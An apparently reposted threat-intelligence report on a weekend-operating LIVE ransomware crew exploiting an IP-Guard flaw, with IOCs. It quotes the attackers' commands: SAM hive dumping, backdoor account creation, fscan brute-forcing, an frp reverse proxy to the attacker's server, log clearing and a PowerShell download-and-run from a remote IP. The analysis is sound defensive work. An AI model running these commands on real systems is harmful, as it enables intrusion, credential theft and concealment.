揭秘LIVE勒索软件利用IP-Guard漏洞的技战术

攻击者在横向移动所使用的工具主要有Cobalt Strike、fscan、frp、勒索投递包等，攻击手法与护网期间的国内红队有着很高的相似性。

概述XCN品论天涯网

奇安信威胁情报中心观察到一伙较为勤奋的勒索运营商，工作时间主要在周末，可以在物理上绕过安全人员对告警的发现。周六的时候使用一些Nday漏洞进行入侵，全天无休的进行内网信息收集，控制机器数量评估，并在周日晚上控制木马批量投递勒索软件，为了给第二天要上班的受害者一个“惊喜”，攻击者在横向移动所使用的工具主要有Cobalt Strike、fscan、frp、勒索投递包等，攻击手法与护网期间的国内红队有着很高的相似性。XCN品论天涯网

文章最后我们就自己的数据视野来分析IP-Guard漏洞相关活动的整个时间线，揭露了当前高强度的攻防对抗状态。XCN品论天涯网

XCN品论天涯网

典型渗透攻击过程回顾XCN品论天涯网

攻击者使用IP-Guard漏洞上传webshell后开始收集本机信息，使用webshell执行如下命令：XCN品论天涯网

命令XCN品论天涯网

net userXCN品论天涯网

tasklistXCN品论天涯网

dirXCN品论天涯网

save hklm\\system system.zipXCN品论天涯网

save hklm\\SAMXCN品论天涯网

net1 user audit Aa123456 /addXCN品论天涯网

REG ADD "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /fXCN品论天涯网

攻击者第一步收集本机信息、获取账户密码hash、添加用户并尝试RDP远程登录。接着在%UserProfile%目录下投递名为b.exe的Cobalt Strike木马，启动后将shellcode注入到lsass.exe进程中，C2：38.46.8.218:55324，使用CS在相同目录下投递如下文件，攻击者在投递这些工具时被天擎报毒查杀，由于周末无人观察告警信息导致攻击者很快更换了一批免杀的工具继续“工作”。基本的活动操作如下：XCN品论天涯网

释放的文件XCN品论天涯网	功能XCN品论天涯网
fscan64.exeXCN品论天涯网	扫描器XCN品论天涯网
adduser.exeXCN品论天涯网	添加用户XCN品论天涯网
f.exeXCN品论天涯网	FrpXCN品论天涯网

启动fscan开始对同一C段的服务器进行爆破，所用密码为抓取的服务器明文密码和ntml hash，爆破类型涉及RDP、SSH、SMB、MSSQL等。XCN品论天涯网

命令XCN品论天涯网

fscan64.exe -silent -h 10.XX.X.X/16 -pa 3389 -o 16.txt -pwda XXXXXCN品论天涯网

fscan64.exe -silent -h 10.XX.X.X/24 -m ssh -no -pwda XXXXXCN品论天涯网

fscan64.exe -h 10.XX.X.X/24 -m mssql -pwd XXXXX -o mssql.txt -silentXCN品论天涯网

fscan64 -h 10.XX.X.X/24 -m smb2 -hash XXXX7119 -username administratorXCN品论天涯网

启动frp开启反向代理。XCN品论天涯网

命令XCN品论天涯网

f.exe -t 38.46.8.218 -p 7000XCN品论天涯网

最后清除系统的ps日志。XCN品论天涯网

命令XCN品论天涯网

wevtutil cl "Windows PowerShell"XCN品论天涯网

攻击者经过爆破发现已经掌握的明文密码和hash已经可以登录同C段的十几台机器，最终在周日晚上选择使用Cobalt Strike批量下发勒索投递包windows_encryptor_471820908140_self_contained.exe，内容未SFX自解压文件执行后会在%UserProfile%目录下释放名为systime.exe的LIVE家族勒索加密程序。XCN品论天涯网

使用的Cobalt Strike的IP反查挂有域名（yangaoqing.com），攻击者在入侵前疑似更换了解析的IP。XCN品论天涯网

解析时间XCN品论天涯网	对应IP XCN品论天涯网
2023-01-17~2023-10-09XCN品论天涯网	39.97.108.148（北京阿里云）XCN品论天涯网
2023-10-09~2024-01-18XCN品论天涯网	38.46.8.218（美国）XCN品论天涯网

IP-Guard漏洞的隐密时间线XCN品论天涯网

在奇安信威胁情报的数据视野中最早于2023年9月份就已经看到了IP-Guard的漏洞大规模的测试，多个重要政企受到了入侵，攻击者只执行了whoami命令，当时的研判结论是安全研究员发现了一个0day并进行测试，接着在11月08号友商通过漏洞奖励计划发布该漏洞通报后（未提供POC），11月9日我们就观察到有黑产在使用IP-Guard漏洞进行批量Web攻击，对应命令行如下：XCN品论天涯网

命令XCN品论天涯网

powershell -executionpolicybypass -noprofile -windowstylehidden (new-object system.net.webclient).downloadfile("http：//154.12.57.238:7845/svdcx.exe","svdcx.exe");start-process svdcx.exe"XCN品论天涯网

这波攻击者投递的是ghost、灰鸽子等类型的国产木马，并不适合横向移动，所以这波攻击并没有造成直接的破坏性危害，攻击持续到11月末，接着友商电信安全发布Mallox勒索报告 [1]，文中提到勒索团伙利用IP-Guard漏洞的时间在12月1号。XCN品论天涯网

XCN品论天涯网

XCN品论天涯网

XCN品论天涯网

上述现象并不是个例，威胁情报中心观察到有多个Web漏洞在安全通告发布后马上就能检测到相应的在野攻击，间隔这么短无非只有两种可能：1、黑产自己通过分析补丁很快找到漏洞所在并加以利用；2、安全研究员通过赏金计划上报当时未公开所知的漏洞，然后立即又卖给了黑产，这种可能性也无法排除。XCN品论天涯网

XCN品论天涯网

总结XCN品论天涯网

目前，基于奇安信威胁情报中心的威胁情报数据的全线产品，包括奇安信威胁情报平台（TIP）、天擎、天眼高级威胁检测系统、奇安信NGSOC、奇安信态势感知等，都已经支持对此类攻击的精确检测。XCN品论天涯网

IOCXCN品论天涯网

38.46.8.218:7000XCN品论天涯网

38.46.8.218:55324XCN品论天涯网

yangaoqing.comXCN品论天涯网

XCN品论天涯网

参考链接XCN品论天涯网

[1].https://mp.weixin.qq.com/s/0b08HNOWW61DKGA0xwLxSwXCN品论天涯网